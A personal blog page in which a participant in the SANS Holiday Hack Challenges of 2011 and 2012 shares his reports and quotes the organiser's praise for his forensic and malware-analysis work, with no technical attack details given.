Ed Skoudis and SANS’s holiday hacking challenges are something fun I look forward to every year. They’re always entertaining a good little test of security skills. This year’s “The Year Without a Santa… Hack” was no different. I don’t think I’ve ever seen “The Year Without a Santa,” but the Control Systems twist for the challenge was cool.

Since the submission deadline has passed, I thought I’d post my report here. Looking forward to seeing the results, hopefully this coming week.

2012 Holiday Hack Challenge

by

Christmas 2011 Hacking Challenge

No comments yet

Categories: Challenges, Forensics

I spent a couple nights over my Christmas vacation working on the Christmas 2011 Hacking Challenge on the SANS Pen Test blog. This is the first year I’ve done the challenge, and I had a lot of fun with it. I may have gone a little overboard with the report, but I wanted to try to make it somewhat realistic.

I ended up getting honorable mention when the results were posted. I was pretty happy with that, even though it meant I didn’t win a copy of Ed Skoudis’s book. That wasn’t a big deal since I ended up winning a copy during NetWars at SANS2012 in Orlando, and I wouldn’t really need two copies. I had always meant to post my report when the challenge was over, and I’m just now getting around to that.

Here’s a link to my report and here is what Ed had to say about it in the results post:

Dave Lassalle: Your report was very detailed, and was a close second. You explained the Apple Software Update component of the attack well, explained all of the fields in the CellLocation table, mentioned the GPS anomalies and the duplicate timestamps, and included a great map showing all of the places. You also extracted and ran the iTunesSetup.exe malware and wrote your own handler for it, which was very impressive. Amazing work, beautifully executed.

2011HolidayHackChallenge